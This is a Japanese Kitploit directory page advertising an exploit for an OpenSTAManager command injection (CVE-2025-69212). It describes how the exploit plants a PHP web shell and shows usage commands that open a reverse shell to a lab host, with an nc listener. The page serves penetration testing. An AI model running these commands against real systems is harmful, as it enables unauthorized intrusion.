Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/pasindu-sd/cve-2025-69212-exploit
エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールペイロード開発
GitHubpasindu-sd/cve-2025-69212-exploit

CVE-2025-69212-Exploit

OpenSTAManagerにおけるCVE-2025-69212コマンドインジェクション用の自動化エクスプロイト。管理者認証、悪意のあるZIPアップロード、リバースシェルまたはコマンド実行を備えています。

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
4日前未レビュー
共有

CVE-2025-69212 - OpenSTAManager P7M コマンドインジェクションエクスプロイト

CVE-2025-69212 用の完全自動エクスプロイトスクリプトです。これは OpenSTAManager のコマンドインジェクション脆弱性です。このスクリプトは管理者資格情報で認証し、ZIP アーカイブ内の細工された P7M ファイルを介して悪意のある PHP Web シェルを展開し、コマンド実行またはリバースシェルを提供します。

Features

  • 自動認証。
  • 悪意のある ZIP の生成とアップロード(invoice.p7m インジェクション)。
  • 特殊文字の問題を防ぐための Base64 コマンドラッピング。
  • リバースシェルと単一コマンド実行の引数。

使い方

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> -r <LHOST> <LPORT>

例

単一コマンドを実行:

root@kitploit:~
python3 exploit.py -u http://support_001.enigma.htb -U admin -P 'Password123' -c 'id'

リバースシェルを取得:

root@kitploit:~
# Start your netcat listener in another terminal:
nc -lvnp 4444

# Run the exploit:
python3 exploit.py -u http://support_001.enigma.htb -U admin -P 'Password123' -r 10.10.14.1 4444
ツールをダウンロード